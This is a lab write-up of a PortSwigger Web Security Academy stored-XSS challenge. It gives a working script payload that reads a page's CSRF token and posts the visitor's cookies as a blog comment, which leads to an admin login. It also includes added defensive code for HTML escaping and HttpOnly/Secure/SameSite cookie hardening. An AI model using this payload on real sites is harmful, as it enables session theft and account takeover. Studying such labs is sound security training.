Exploiting cross-site scripting to steal cookies
In this challenge we use a stored XSS attack to steal users' cookies. The lab is another blog site that lets users comment on posts:

[screenshot: comment-section]

If we try XSS with a <script> tag, it succeeds, which means we can simply place our payload inside a <script> tag as-is.

[screenshot: script-tag-attempt]

[screenshot: script-tag-attempt-success]

Now let's create a payload that gets hold of the user's cookies. There are two ways to do this:

  1. Send the user's cookies to a webhook or to our own site that collects them
  2. Show the cookies in the comment box

I tried the first option but the result was not what I expected: I only got a session but not the cookies we need to gain access, since it was a third party and PortSwigger didn't allow us to use a third-party app. So I tried the second option. I created a payload that forces the user to submit a comment to the blog; you can find the right endpoint and the required data by intercepting the request in Burp Suite. To post a comment, we need their CSRF token, which we can find in the <input> tag attribute.

[screenshot: CSRF-value]

This is my final payload:

```html
<script>
    // Run once the page, including the comment form, has loaded
    window.onload = function(){
        // Read the CSRF token from the first <input> on the page
        const Token = document.getElementsByTagName('input')[0].value
        // Build the form body; the comment field carries document.cookie
        var data = 'csrf='+Token +'&'
        data += 'postId=10&'
        data += 'comment='+document.cookie+'&'
        data += 'name=DjumantotheAdmin&'
        data += 'email=roc@chic.com&'
        data += 'website=https://google.com'
        // Submit the comment from the visitor's browser; no-cors because the response is not needed
        fetch('https://0a4500e6034e583480d12b22009f0070.web-security-academy.net/post/comment', 
                {
                    method: 'POST',
                    mode: 'no-cors',
                    body: data
                }
            )
    };
</script>
```

So here's how the code works:

  • We run it once the page has loaded by assigning a handler to window.onload
  • We take their CSRF token from the <input> tag
  • We set the comment to their cookies
  • We set postId to the current blog post's value, which is 10
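The two weaknesses the payload above relies on are that comment text is rendered into the page unescaped and that the session cookie is readable from document.cookie. The following is an added example (not the lab's code and not part of the original write-up) showing, from the blog's side, the vulnerable renderer beside an entity-encoding one, a hardened Set-Cookie header, and a small audit helper for cookie attributes. Function names, the comment shape and the sample comment are constructed for this example; it runs under Node with no dependencies.

```javascript
// Added example: defensive counterpart to the stored-XSS payload above.
// Nothing here is lab code; names and sample data are constructed.

// Encode the five characters that let text break out of an HTML text node
// or a quoted attribute value. Rendering user input through this removes
// the sink that a <script> payload in a comment needs.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable rendering: user-controlled fields are concatenated into markup
// unchanged, so a comment containing <script> becomes executable script.
function renderCommentUnsafe(comment) {
  return `<p class="comment"><b>${comment.name}</b>: ${comment.body}</p>`;
}

// Hardened rendering: every user-controlled field is entity-encoded first.
function renderCommentSafe(comment) {
  return `<p class="comment"><b>${escapeHtml(comment.name)}</b>: ${escapeHtml(comment.body)}</p>`;
}

// Session cookie with HttpOnly (not exposed via document.cookie), Secure
// (HTTPS only) and SameSite=Lax (not sent on cross-site POSTs).
function sessionCookieHeader(name, value) {
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Audit a Set-Cookie header value and list the hardening attributes it
// lacks. Handy in a response-header test or a deployment check.
function auditSetCookie(header) {
  const attrs = header.split(';').slice(1).map((a) => a.trim().toLowerCase());
  const missing = [];
  if (!attrs.includes('httponly')) missing.push('HttpOnly');
  if (!attrs.includes('secure')) missing.push('Secure');
  if (!attrs.some((a) => a.startsWith('samesite='))) missing.push('SameSite');
  return missing;
}

// Constructed sample comment in the shape of the lab's comment form.
const hostile = {
  name: 'visitor',
  body: '<script>alert(document.cookie)</script>',
};

// Demonstration on the constructed sample.
console.log('unsafe:', renderCommentUnsafe(hostile));
console.log('safe:  ', renderCommentSafe(hostile));
console.log('missing on a bare cookie:', auditSetCookie('session=abc; Path=/'));
console.log('missing on hardened cookie:', auditSetCookie(sessionCookieHeader('session', 'abc')));
```

Note that the CSRF token the payload reads does nothing against this attack: the request is made by the page's own origin, so the token is simply available to the injected script. Output encoding removes the injection; HttpOnly limits what a script can read if another injection point is ever found.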

And this is the result:

[screenshot: attempt-using-payload]

[screenshot: Result]

[screenshot: Success]

[screenshot: login-as-admin]